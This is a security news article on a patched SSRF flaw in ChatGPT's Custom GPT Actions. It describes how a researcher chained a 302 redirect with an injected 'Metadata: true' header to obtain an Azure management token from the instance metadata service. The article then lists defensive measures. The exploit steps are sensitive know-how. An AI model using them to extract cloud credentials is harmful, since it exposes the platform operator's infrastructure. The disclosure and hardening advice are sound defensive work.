SHARE
Facebook X Pinterest WhatsApp

ChatGPT Exploited Through SSRF Flaw in Custom GPT Actions

A patched SSRF flaw in ChatGPT’s Custom GPTs exposed how AI features can unintentionally reveal sensitive cloud metadata.

Written By
thumbnail
Ken Underhill
Ken Underhill
Nov 13, 2025
eSecurity Planet content and product recommendations are editorially independent. We may make money when you click on links to our partners. Learn More

OpenAI has patched a high-severity SSRF flaw in ChatGPT’s Custom GPTs feature after a researcher showed it could expose internal cloud metadata and potentially Azure credentials. 

The issue underscores growing concerns about how user-controlled URL inputs in AI systems can introduce traditional web vulnerabilities into advanced AI-driven environments.

How Redirects and Headers Enabled the SSRF Exploit

SSRF vulnerabilities occur when applications fetch resources from user-supplied URLs without proper validation, allowing attackers to coerce systems into making unauthorized internal requests.

In cloud environments, the stakes are especially high because metadata endpoints often contain instance information and temporary access tokens. 

Abuse of these endpoints can lead to cloud breaches across multiple providers.

Custom GPTs, a premium ChatGPT feature, allow users to integrate external APIs using OpenAPI schemas. 

These “Actions” enable GPTs to pull real-time information — such as weather data — via external HTTP requests. 

While exploring the interface, the researcher noticed that the system allowed arbitrary API URLs along with configurable authentication headers. 

A built-in “Test” button executed these requests directly from OpenAI’s infrastructure, raising immediate concerns about SSRF exposure.

Initially, an exploit attempt failed because the system required HTTPS URLs while Azure’s Instance Metadata Service (IMDS) uses unencrypted HTTP. 

However, the researcher bypassed the restriction by redirecting an HTTPS endpoint to the IMDS URL using a 302 redirect from an external domain. 

OpenAI’s servers followed the redirect but were still denied access because Azure requires the special header Metadata: true.

How the Researcher Exploited the SSRF Flaw

The breakthrough came when the researcher realized that the Custom GPT interface allowed arbitrary API key headers. 

By naming one “Metadata” and assigning the value “true,” the request successfully injected the necessary header. 

With the correct redirect and header combination, the researcher retrieved IMDS metadata, including a valid OAuth2 token for Azure’s management API.

This token, which was issued automatically by the managed identity assigned to the compute environment, provided access to sensitive cloud resources. 

The exposed metadata included privileged Azure tokens capable of interacting with OpenAI’s cloud footprint. 

While the researcher noted that this was not the most severe flaw they had discovered, the potential for lateral movement and cloud resource enumeration made the issue highly dangerous.

Hardening AI Platforms Against SSRF Threats

With OpenAI releasing a patch for the recent SSRF vulnerability, organizations should still implement additional safeguards to protect against similar risks, including:

  • Enforce strict allowlists for outbound connections: Restrict server-side traffic so applications can communicate only with approved external services.
  • Block cloud metadata endpoints by default: Disable IMDS access where possible, or require IMDSv2/authorized requests to reduce accidental exposure.
  • Use network egress controls: Implement firewall rules and virtual network security groups to stop unintended internal or external requests.
  • Apply zero-trust validation for AI-driven requests: Treat all AI-generated or AI-triggered network activity as untrusted until fully verified.
  • Implement strong identity and access management (IAM) boundaries: Limit privileges attached to cloud compute roles to reduce the blast radius of compromised tokens.
  • Monitor for anomalous outbound traffic: Use behavioral analytics to detect unusual internal metadata calls, redirect chains, or repeated failed access attempts.
  • Review third-party integrations in AI workflows: Ensure API schemas, user-provided URLs, and custom AI actions are sandboxed and validated.

As AI systems continue to integrate more deeply into critical business workflows, securing their network behavior becomes essential to maintaining trust and resilience.

The discovery of this SSRF flaw demonstrates how traditional web security issues can resurface in unexpected ways as AI platforms grow more complex and interconnected. 

While OpenAI responded quickly with a patch, the incident underscores the importance of layered security. 

Organizations should reinforce identity-driven controls and implement continuous verification using zero-trust solutions

Recommended for you...

Google Debuts Private AI Compute to Protect Data in Cloud AI
PromptJacking: When AI Chat Prompts Become Cyber Attacks
Ken Underhill
Nov 5, 2025
ChatGPT Bugs Put Private Data at Risk
Ken Underhill
Nov 4, 2025
Hackers Hijack OpenAI API in Stealthy New Backdoor Attack
Ken Underhill
Nov 4, 2025
eSecurity Planet Logo

eSecurity Planet is a leading resource for IT professionals at large enterprises who are actively researching cybersecurity vendors and latest trends. eSecurity Planet focuses on providing instruction for how to approach common security challenges, as well as informational deep-dives about advanced cybersecurity topics.

Property of TechnologyAdvice. © 2025 TechnologyAdvice. All Rights Reserved

Advertiser Disclosure: Some of the products that appear on this site are from companies from which TechnologyAdvice receives compensation. This compensation may impact how and where products appear on this site including, for example, the order in which they appear. TechnologyAdvice does not include all companies or all types of products available in the marketplace.